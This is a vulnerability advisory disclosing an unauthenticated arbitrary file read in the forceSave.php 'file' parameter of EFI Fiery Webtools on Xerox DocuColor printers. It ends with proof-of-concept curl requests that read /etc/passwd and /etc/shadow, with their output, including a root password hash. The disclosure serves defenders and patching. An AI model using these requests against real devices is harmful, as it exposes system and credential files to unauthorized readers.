Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure Vendor: Electronics for Imaging, Inc. Product web page: http://www.efi.com Affected version: EFI Fiery Controller SW2.0 Xerox DocuColor 260, 250, 242 Summary: Drive production profitability with Fiery servers and workflow products. See which Fiery digital front end is right for your current or future print engines and business needs. Manage all your printers from a single screen using this intuitive print job management interface. Desc: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. ====================================================================== /wt3/js/save.js: ---------------- 103: function parseSaveMessages() { 104: var urlNode = saveDocument.getElementsByTagName('url').item(0); 105: var url = urlNode.firstChild.data; 106: var forcedSaveUrl = "forceSave.php?file=" + url; 107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1'); ==== /wt3/forceSave.php: ------------------- 1. ====================================================================== Tested on: Debian GNU/Linux 3.1 Apache PHP/5.4.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5447 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php 20.12.2017 -- # curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync games:x:5:100:games:/usr/games:/bin/sh ... ... # curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow" root:LUUVeT6GbOy9I:10978:0:99999:7::: daemon:*:10979:0:99999:7::: bin:*:10979:0:99999:7::: sys:*:10979:0:99999:7::: sync:*:10979:0:99999:7::: games:*:10979:0:99999:7::: ... ...